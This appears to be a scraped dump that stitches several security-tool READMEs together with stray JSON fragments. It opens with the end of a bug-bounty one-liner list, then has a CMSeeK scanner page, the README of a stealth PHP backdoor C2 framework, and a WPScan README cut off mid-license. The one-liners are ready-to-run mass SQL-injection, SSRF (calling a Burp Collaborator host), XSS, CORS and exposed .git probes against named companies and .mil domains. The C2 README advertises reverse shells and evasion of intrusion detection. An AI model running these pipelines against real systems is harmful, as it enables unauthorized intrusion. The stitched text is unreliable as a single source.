output/resultJSPASS'\n```\n\n\n### My recon automation simple. OFJAAAH.sh\n\n- [Explaining command](https://bit.ly/3nWHM22)\n\n```bash\nchaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1\n```\n\n### Download all domains to bounty chaos\n\n- [Explaining command](https://bit.ly/38wPQ4o)\n\n```bash\ncurl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH'\n```\n\n### Recon to search SSRF Test\n\n- [Explaining command](https://bit.ly/3shFFJ5)\n\n```bash\nfindomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep \"=\" | qsreplace http://YOUR.burpcollaborator.net\n```\n\n\n### ShuffleDNS to domains in file scan nuclei.\n\n- [Explaining command](https://bit.ly/2L3YVsc)\n\n```bash\nxargs -a domain -I@ -P500 sh -c 'shuffledns -d \"@\" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1\n```\n\n\n### Search Asn Amass\n\n- [Explaining command](https://bit.ly/2EMooDB)\n\nAmass intel will search the organization \"paypal\" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me)\n\n```bash\namass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500''\n```\n\n### SQLINJECTION Mass domain file\n\n- [Explaining command](https://bit.ly/354lYuf)\n\n```bash\n\nhttpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'\n```\n\n\n### Using chaos search js\n\n\n- [Explaining command](https://bit.ly/32vfRg7)\n\nChaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of \"att.com\". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for \"(http|https)://att.com\" to make sure we dont recieve output for domains that are not \"att.com\".\n\n```bash\nchaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s \"@\" -d 2' | grep -Eo \"(http|https)://[^/\"].*.js+\" | sed \"s#]\n```\n\n### Search Subdomain using Gospider\n\n\n- [Explaining command](https://bit.ly/2QtG9do)\n\nGoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS\n\n```bash\ngospider -d 0 -s \"https://site.com\" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/\"]+' | anew\n```\n\n### Using gospider to chaos\n\n\n- [Explaining command](https://bit.ly/2D4vW3W)\n\nGoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input.\n\n\n```bash\nchaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s \"@\" -d 3'\n```\n\n### Using recon.dev and gospider crawler subdomains\n\n- [Explaining command](https://bit.ly/32pPRDa)\n\nWe will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces\nIf anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains.\nXargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls.\n\n```bash\ncurl \"https://recon.dev/api/search?key=apiKEY&domain=paypal.com\" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/\"]+' | anew\n```\n\n### PSQL - search subdomain using cert.sh\n\n- [Explaining command](https://bit.ly/32rMA6e)\n\nMake use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs\n\n```bash\npsql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\\n' | grep twitch | anew\n```\n\n### Search subdomains using github and httpx\n\n- [Github-search](https://github.com/gwen001/github-search)\n\nUsing python3 to search subdomains, httpx filter hosts by up status-code response (200)\n\n```python\n./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title\n```\n\n### Search SQLINJECTION using qsreplace search syntax error\n\n- [Explained command](https://bit.ly/3hxFWS2)\n\n```bash\ngrep \"=\" .txt| qsreplace \"' OR '1\" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn \"syntax\\|mysql\" output 2>/dev/null && \\printf \"TARGET \\033[0;32mCould Be Exploitable\\e[m\\n\" || printf \"TARGET \\033[0;31mNot Vulnerable\\e[m\\n\"\n```\n\n### Search subdomains using jldc\n\n- [Explained command](https://bit.ly/2YBlEjm)\n\n```bash\ncurl -s \"https://jldc.me/anubis/subdomains/att.com\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | anew\n```\n\n### Search subdomains in assetfinder using hakrawler spider to search links in content responses\n\n- [Explained command](https://bit.ly/3hxRvZw)\n\n```bash\nassetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep \"tesla\"\n```\n\n### Search subdomains in cert.sh\n\n- [Explained command](https://bit.ly/2QrvMXl)\n\n```bash\ncurl -s \"https://crt.sh/?q=%25.att.com&output=json\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | httpx -title -silent | anew\n```\n\n### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD\n\n- [Explained command](https://bit.ly/3lhFcTH)\n\n```bash\ncurl -s \"https://crt.sh/?q=%25.tesla.com&output=json\" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew\n```\n```bash\ncurl -s \"https://crt.sh/?q=%25.enjoei.com.br&output=json\" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew\n```\n### Collect js files from hosts up by gospider\n\n- [Explained command](https://bit.ly/3aWIwyI)\n\n```bash\nxargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s \"https://@\" -d 2 | grep -Eo \"(http|https)://[^/\\\"].*\\.js+\" | sed \"s#\\] \\- #\\n#g\" | anew'\n```\n\n### Subdomain search Bufferover resolving domain to httpx\n\n- [Explained command](https://bit.ly/3lno9j0)\n\n```bash\ncurl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\\n/g' | httpx -silent | anew\n```\n\n### Using gargs to gospider search with parallel proccess\n- [Gargs](https://github.com/brentp/gargs)\n\n- [Explained command](https://bit.ly/2EHj1FD)\n\n```bash\nhttpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne\n```\n\n### Injection xss using qsreplace to urls filter to gospider\n\n- [Explained command](https://bit.ly/3joryw9)\n\n```bash\ngospider -S domain.txt -t 3 -c 100 | tr \" \" \"\\n\" | grep -v \".js\" | grep \"https://\" | grep \"=\" | qsreplace '%22>'\n```\n\n### Extract URL's to apk\n\n- [Explained command](https://bit.ly/2QzXwJr)\n\n```bash\napktool d app.apk -o uberApk;grep -Phro \"(https?://)[\\w\\.-/]+[\\\"'\\`]\" uberApk/ | sed 's#\"##g' | anew | grep -v \"w3\\|android\\|github\\|schemas.android\\|google\\|goo.gl\"\n```\n\n### Chaos to Gospider\n\n- [Explained command](https://bit.ly/3gFJbpB)\n\n```bash\nchaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H \"x-forwarded-for: 127.0.0.1\" -H \"User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1\" -s @\n```\n\n### Checking invalid certificate\n\n- [Real script](https://bit.ly/2DhAwMo)\n- [Script King](https://bit.ly/34Z0kIH)\n\n```bash\nxargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep \"EXPIRED\" | awk '/domain/{print $5}' | httpx\n```\n\n### Using shodan & Nuclei\n\n- [Explained command](https://bit.ly/3jslKle)\n\nShodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column.\nhttpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates.\n\n```bash\nshodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/\n```\n\n### Open Redirect test using gf.\n\n- [Explained command](https://bit.ly/3hL263x)\n\necho is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates.\n\n```bash\necho \"domain\" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew\n```\n\n### Using shodan to jaeles \"How did I find a critical today? well as i said it was very simple, using shodan and jaeles\".\n\n- [Explained command](https://bit.ly/2QQfY0l)\n\n```bash\nshodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @\n```\n### Using Chaos to jaeles \"How did I find a critical today?.\n\n- [Explained command](https://bit.ly/2YXiK8N)\n\nTo chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. \n\n```bash\nchaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ \n```\n\n### Using shodan to jaeles\n\n- [Explained command](https://bit.ly/2Dkmycu)\n\n```bash\ndomain=\"domaintotest\";shodan domain $domain | awk -v domain=\"$domain\" '{print $1\".\"domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts \n```\n\n### Search to files using assetfinder and ffuf\n\n- [Explained command](https://bit.ly/2Go3Ba4)\n\n```bash\nassetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H \"Content-Type: application/json\" -t 150 -H \"X-Forwarded-For:127.0.0.1\"'\n```\n\n### HTTPX using new mode location and injection XSS using qsreplace.\n\n- [Explained command](https://bit.ly/2Go3Ba4)\n\n```bash\nhttpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/\"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\\n' | grep -Eo '(http|https)://[^/\"].*' | grep \"=\" | qsreplace \"\" \"'\n```\n\n### Grap internal juicy paths and do requests to them.\n\n- [Explained command](https://bit.ly/357b1IY)\n\n```bash\nexport domain=\"https://target\";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v \"http\" | grep -v \"http\" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length'\n```\n\n### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url.\n\n- [Explained command](https://bit.ly/2R2gNn5)\n\n```bash\nwget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew\n```\n\n### Using to findomain to SQLINJECTION.\n\n- [Explained command](https://bit.ly/2ZeAhcF)\n\n```bash\nfindomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1\n```\n\n### Jaeles scan to bugbounty targets.\n\n- [Explained command](https://bit.ly/3jXbTnU)\n\n```bash\nwget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @\n```\n\n### JLDC domain search subdomain, using rush and jaeles.\n\n- [Explained command](https://bit.ly/3hfNV5k)\n\n```bash\ncurl -s \"https://jldc.me/anubis/subdomains/sony.com\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'\n```\n\n### Chaos to search subdomains check cloudflareip scan port.\n\n- [Explained command](https://bit.ly/3hfNV5k)\n\n```bash\nchaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent\n```\n### Search JS to domains file.\n\n- [Explained command](https://bit.ly/2Zs13yj)\n\n```bash\ncat FILE TO TARGET | httpx -silent | subjs | anew\n```\n\n### Search JS using assetfinder, rush and hakrawler.\n\n- [Explained command](https://bit.ly/3ioYuV0)\n\n```bash\nassetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep \"paypal\"\n```\n\n### Search to CORS using assetfinder and rush\n\n- [Explained command](https://bit.ly/33qT71x)\n\n```bash\nassetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H \"Origin:evil.com\" {} | [[ $(grep -c \"evil.com\") -gt 0 ]] && printf \"\\n\\033[0;32m[VUL TO CORS] - {}\\e[m\"' 2>/dev/null\"\n```\n\n### Search to js using hakrawler and rush & unew\n\n- [Explained command](https://bit.ly/2Rqn9gn)\n\n```bash\ncat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx'\n```\n\n### XARGS to dirsearch brute force.\n\n- [Explained command](https://bit.ly/32MZfCa)\n\n```bash\ncat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' \n```\n\n### Assetfinder to run massdns.\n\n- [Explained command](https://bit.ly/32T5W5O)\n\n```bash\nassetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\\..$//' | httpx -silent\n```\n\n### Extract path to js\n\n- [Explained command](https://bit.ly/3icrr5R)\n\n```bash\ncat file.js | grep -aoP \"(?<=(\\\"|\\'|\\`))\\/[a-zA-Z0-9_?&=\\/\\-\\#\\.]*(?=(\\\"|\\'|\\`))\" | sort -u \n```\n\n### Find subdomains and Secrets with jsubfinder\n\n- [Explained command](https://bit.ly/3dvP6xq)\n\n```bash\ncat subdomsains.txt | httpx --silent | jsubfinder -s\n```\n\n### Search domains to Range-IPS.\n\n- [Explained command](https://bit.ly/3fa0eAO)\n\n```bash\ncat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew \n```\n\n### Search new's domains using dnsgen.\n\n- [Explained command](https://bit.ly/3kNTHNm)\n\n```bash\nxargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain\n```\n\n### List ips, domain extract, using amass + wordlist\n\n- [Explained command](https://bit.ly/2JpRsmS)\n\n```bash\namass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\\n' | sort -u > ips-amass.txt ; curl -s \"https://crt.sh/?q=%.navy.mil&output=json\" | jq '.[].name_value' | sed 's/\\\"//g' | sed 's/\\*\\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt\n```\n### Search domains using amass and search vul to nuclei.\n\n- [Explained command](https://bit.ly/3gsbzNt)\n\n```bash\namass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 \n```\n\n### Verify to cert using openssl.\n\n- [Explained command](https://bit.ly/37avq0C)\n\n```bash\nsed -ne 's/^\\( *\\)Subject:/\\1/p;/X509v3 Subject Alternative Name/{\n N;s/^.*\\n//;:a;s/^\\( *\\)\\(.*\\), /\\1\\2\\n\\1/;ta;p;q; }' < <(\n openssl x509 -noout -text -in <(\n openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\\r\\n\\r' \\\n -connect hackerone.com:443 ) )\n```\n\n\n### Search domains using openssl to cert.\n\n- [Explained command](https://bit.ly/3m9AsOY)\n\n```bash\nxargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\\n/g' | httpx -silent -threads 1000 | anew \n```\n\n\n\n### Search to Hackers.\n\n- [Censys](https://censys.io)\n- [Spyce](https://spyce.com)\n- [Shodan](https://shodan.io)\n- [Viz Grey](https://viz.greynoise.io)\n- [Zoomeye](https://zoomeye.org)\n- [Onyphe](https://onyphe.io)\n- [Wigle](https://wigle.net)\n- [Intelx](https://intelx.io)\n- [Fofa](https://fofa.so)\n- [Hunter](https://hunter.io)\n- [Zorexeye](https://zorexeye.com)\n- [Pulsedive](https://pulsedive.com)\n- [Netograph](https://netograph.io)\n- [Vigilante](https://vigilante.pw)\n- [Pipl](https://pipl.com)\n- [Abuse](https://abuse.ch)\n- [Cert-sh](https://cert.sh)\n- [Maltiverse](https://maltiverse.com/search)\n- [Insecam](https://insecam.org)\n- [Anubis](https://https://jldc.me/anubis/subdomains/att.com)\n- [Dns Dumpster](https://dnsdumpster.com)\n- [PhoneBook](https://phonebook.cz)\n- [Inquest](https://labs.inquest.net)\n- [Scylla](https://scylla.sh)\n\n\n# Project\n\n[![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org)\n[![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/)\n[![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/)\n[![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty)\n\n\n\n\"Buy\n\n\n"}}},{"rowIdx":667,"cells":{"text":{"kind":"string","value":"---\ntitle: \"CMSeeK\"\ncategory: \"scanner\"\ntype: \"CMS\"\nstate: \"released\"\nappVersion: \"1.1.3\"\nusecase: \"Automation of the process of detecting the Joomla CMS and its core vulnerabilities\"\n---\n\n\n\n\n

\n \"License\n \"GitHub\n \"OWASP\n \"Artifact\n \"GitHub\n \"Twitter\n

\n\n## What is CMSeeK?\nCMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and it's installed extensions.\nWe use it to scan Joomla CMS. It also has a database with known vulnerabilities.\n\nTo learn more about the CMSeeK scanner itself visit [https://github.com/Tuhinshubhra/CMSeeK].\n\n## Deployment\nThe cmseek chart can be deployed via helm:\n\n```bash\n# Install HelmChart (use -n to configure another namespace)\nhelm upgrade --install cmseek secureCodeBox/cmseek\n```\n\n## Scanner Configuration\n\nThe CMSeeK targets are specified with the `-u` parameter. The target should be a hostname or an IP address.\n\nAdditional CMSeeK scan features can be configured via the parameter attribute.\n\nSome useful example parameters listed below:\n\n- `-u URL, --url URL` : Target Url.\n- `--follow-redirect` : Follows all/any redirect(s).\n- `--no-redirect` : kips all redirects and tests the input target(s)\n- `-r, --random-agent`: Use a random user agent.\n- `--googlebot`: Use Google bot user agent.\n- `--user-agent USER_AGENT`: Specify a custom user agent\n\n## Requirements\n\nKubernetes: `>=v1.11.0-0`\n\n"}}},{"rowIdx":668,"cells":{"text":{"kind":"string","value":"

\n \n \"Master\"\n \n

\n\n

\n Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner\n \n \"tweet\"\n \n

\n
\n\n

\n \n \"Unit\n \n \n \"Dependabot\n \n \n \"codacy\n \n \n \"CodeQL\n \n \n \"codecov\n \n \n \"codeclimate\n \n

\n\n

\n \n \n \n \n \n \n \n \n \n \n \n \n

\n\n
\n \n Created by\n nil0x42 and\n contributors\n \n
\n\n
\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n

\n \n

\n\n\n#### Overview\n\nThe obfuscated communication is accomplished using HTTP headers under\nstandard client requests and web server's relative responses, tunneled\nthrough a tiny **polymorphic backdoor**:\n\n```php\n\n```\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Quick Start\n\n```sh\ngit clone https://github.com/nil0x42/phpsploit\ncd phpsploit/\npip3 install -r requirements.txt\n./phpsploit --interactive --eval \"help help\"\n```\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Features\n\n- **Efficient**: More than 20 plugins to automate privilege-escalation tasks\n - Run commands and browse filesystem, bypassing PHP security restrictions\n - Upload/Download files between client and target\n - Edit remote files through local text editor\n - Run SQL console on target system\n - Spawn reverse TCP shells\n\n- **Stealth**: The framework is made by paranoids, for paranoids\n - Nearly invisible by log analysis and NIDS signature detection\n - Safe-mode and common _PHP security restrictions bypass_\n - Communications are hidden in HTTP Headers\n - Loaded payloads are obfuscated to _bypass NIDS_\n - http/https/socks4/socks5 **Proxy support**\n\n- **Convenient**: A robust interface with many crucial features\n - Detailed help for any option (`help` command)\n - _Cross-platform_ on both client and server.\n - CLI supports auto-completion & multi-command\n - Session saving/loading feature & persistent history\n - Multi-request support for large payloads (such as uploads)\n - Provides a powerful, highly configurable settings engine\n - Each setting, such as user-agent has a _polymorphic mode_\n - Customisable environment variables for plugin interaction\n - Provides a complete plugin development API\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Supported platforms (as attacker):\n\n- GNU/Linux\n- Mac OS X\n\n#### Supported platforms (as target):\n\n- GNU/Linux\n- BSD-like\n- Mac OS X\n- Windows NT\n\n## Contributors\n\n\n\n\nThanks goes to these wonderful people:\n\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
\"\"/
nil0x42

💻 🚇 🔌 ⚠️
\"\"/
shiney-wh

💻 🔌
\"\"/
Wannes Rombouts

💻 🚧
\"\"/
Amine Ben Asker

💻 🚧
\"\"/
jose nazario

📖 🐛
\"\"/
Sujit Ghosal

📝
\"\"/
Zerdoumi

🐛
\"\"/
tristandostaler

🐛
\"\"/
Rohan Tarai

🐛
\"\"/
Jonas Lejon

📝
\n\n\n\n\nThis project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome\n\n\n"}}},{"rowIdx":669,"cells":{"text":{"kind":"string","value":"![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png \"WPScan - WordPress Security Scanner\")\n\n[![Gem Version](https://badge.fury.io/rb/wpscan.svg)](https://badge.fury.io/rb/wpscan)\n[![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan)\n[![Code Climate](https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg)](https://codeclimate.com/github/wpscanteam/wpscan)\n[![Patreon Donate](https://img.shields.io/badge/patreon-donate-green.svg)](https://www.patreon.com/wpscan)\n\n# INSTALL\n\n## Prerequisites\n\n- (Optional but highly recommended: [RVM](https://rvm.io/rvm/install))\n- Ruby >= 2.3 - Recommended: latest\n - Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see [#1283](https://github.com/wpscanteam/wpscan/issues/1283)\n- Curl >= 7.21 - Recommended: latest\n - The 7.29 has a segfault\n- RubyGems - Recommended: latest\n\n### From RubyGems (Recommended)\n\n```shell\ngem install wpscan\n```\n\nOn MacOSX, if a ```Gem::FilePermissionError``` is raised due to the Apple's System Integrity Protection (SIP), either install RVM and install wpscan again, or run ```sudo gem install -n /usr/local/bin wpscan``` (see [#1286](https://github.com/wpscanteam/wpscan/issues/1286))\n\n### From sources (NOT Recommended)\n\nPrerequisites: Git\n\n```shell\ngit clone https://github.com/wpscanteam/wpscan\n\ncd wpscan/\n\nbundle install && rake install\n```\n\n# Updating\n\nYou can update the local database by using ```wpscan --update```\n\nUpdating WPScan itself is either done via ```gem update wpscan``` or the packages manager (this is quite important for distributions such as in Kali Linux: ```apt-get update && apt-get upgrade```) depending how WPScan was (pre)installed\n\n# Docker\n\nPull the repo with ```docker pull wpscanteam/wpscan```\n\nEnumerating usernames\n\n```shell\ndocker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u\n```\n\nEnumerating a range of usernames\n\n```shell\ndocker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100\n```\n\n** replace u1-100 with a range of your choice.\n\n# Usage\n\n```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used.\nAs a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'.\n\nFor more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo)\n\nThe DB is located at ~/.wpscan/db\n\nWPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last):\n\n- ~/.wpscan/cli_options.json\n- ~/.wpscan/cli_options.yml\n- pwd/.wpscan/cli_options.json\n- pwd/.wpscan/cli_options.yml\n\nIf those files exist, options from them will be loaded and overridden if found twice.\n\ne.g:\n\n~/.wpscan/cli_options.yml:\n\n```yml\nproxy: 'http://127.0.0.1:8080'\nverbose: true\n```\n\npwd/.wpscan/cli_options.yml:\n\n```yml\nproxy: 'socks5://127.0.0.1:9090'\nurl: 'http://target.tld'\n```\n\nRunning ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld```\n\nEnumerating usernames\n\n```shell\nwpscan --url https://target.tld/ --enumerate u\n```\n\nEnumerating a range of usernames\n\n```shell\nwpscan --url https://target.tld/ --enumerate u1-100\n```\n\n** replace u1-100 with a range of your choice.\n\n# PROJECT HOME\n\n[https://wpscan.org](https://wpscan.org)\n\n# VULNERABILITY DATABASE\n\n[https://wpvulndb.com](https://wpvulndb.com)\n\n# LICENSE\n\n## WPScan Public Source License\n\nThe WPScan software (henceforth referred to simply as \"WPScan\") is dual-licensed - Copyright 2011-2019 WPScan Team.\n\nCases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.\n\n### 1. Definitions\n\n1.1 \"License\" means this document.\n\n1.2 \"Contributor\" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.\n\n1.3 \"WPScan Team\" means WPScan’s core developers.\n\n### 2. Commercialization\n\nA commercial use is one intended for commercial advantage or monetary compensation.\n\nExample cases of commercialization are:\n\n- Using WPScan to provide commercial managed/Software-as-a-Service services.\n- Distributing WPScan as a commercial product or as part of one.\n- Using WPScan as a value added service/product.\n\nExample cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to):\n\n- Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit.\n- Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux.\n- Using WPScan to test your own systems.\n- Any non-commercial use of WPScan.\n\nIf you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - team@wpscan.org.\n\nFree-use Terms and Conditions;\n\n### 3. Redistribution\n\nRedistribution is permitted under the following conditions:\n\n- Unmodified License is provided with WPScan.\n- Unmodified Copyright notices are provided with WPScan.\n- Does not conflict with the commercialization clause.\n\n### 4. Copying\n\nCopying is permitted so long as it does not conflict with the Redistribution clause.\n\n### 5. Modification\n\nModification is permitted so long as it does not conflict with the Redistribution clause.\n\n### 